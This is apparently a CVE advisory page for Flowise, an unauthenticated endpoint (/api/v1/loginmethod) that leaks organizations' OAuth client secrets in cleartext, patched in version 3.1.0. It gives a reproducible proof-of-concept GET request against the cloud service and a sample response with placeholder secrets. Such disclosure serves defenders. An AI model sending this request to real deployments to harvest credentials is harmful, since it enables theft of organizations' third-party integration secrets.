Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
Description
Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request ``http GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2 Host: cloud.flowiseai.com Accept: application/json Content-Type: application/json ``
Response: The server returns 200 OK with sensitive credentials: ``json { "providers": [ { "id": "a04ba769-b810-481d-8d6b-84f8c377dea5", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "azure", "config": { "tenantID": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "google", "config": { "clientID": "123455", "clientSecret": "123455" }, "status": "enable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "auth0", "config": { "domain": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "github", "config": { "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" } ], "callbacks": [ { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" }, { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" }, { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" }, { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" } ] } ``
Affected
Deployments - FlowiseAI Cloud (cloud.flowiseai.com) - Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
flowisenpm | < 3.1.0 | 3.1.0 |
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing authentication check on the /api/v1/loginmethod endpoint allows unauthenticated access to SSO configuration containing cleartext OAuth secrets."
Attack vector
An unauthenticated attacker sends a GET request to `/api/v1/loginmethod?organizationId=<any_organization_id>` without any cookies or authorization headers [ref_id=1]. The server responds with the full SSO configuration for the specified organization, including OAuth client secrets (e.g., Google, GitHub, Azure, Auth0) in cleartext [CWE-312] [ref_id=1]. Because no authentication check is performed on this endpoint, any attacker who knows or guesses a valid organizationId can exfiltrate sensitive credentials [CWE-306].
Affected code
The vulnerable endpoint is `/api/v1/loginmethod` on FlowiseAI Cloud (cloud.flowiseai.com) and self-hosted instances where that endpoint is exposed [ref_id=1]. The advisory does not specify the exact source file or function name responsible for the handler.
What the fix does
The advisory does not include a patch or specific remediation code [ref_id=1]. The recommended fix is to enforce authentication on the `/api/v1/loginmethod` endpoint so that only authorized users (e.g., organization members or administrators) can retrieve SSO configuration. Additionally, OAuth client secrets should not be returned in API responses or should be masked/encrypted to prevent cleartext exposure [CWE-312].
Preconditions
- networkThe /api/v1/loginmethod endpoint must be exposed (true for FlowiseAI Cloud and self-hosted instances that have not restricted it)
- inputAttacker must know or guess a valid organizationId UUID
- authNo authentication or authorization is required
Reproduction
Send the following HTTP request without any cookies or authorization headers:
``` GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2 Host: cloud.flowiseai.com Accept: application/json Content-Type: application/json ```
The server returns HTTP 200 with the organization's SSO provider configuration, including cleartext OAuth client secrets [ref_id=1].
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.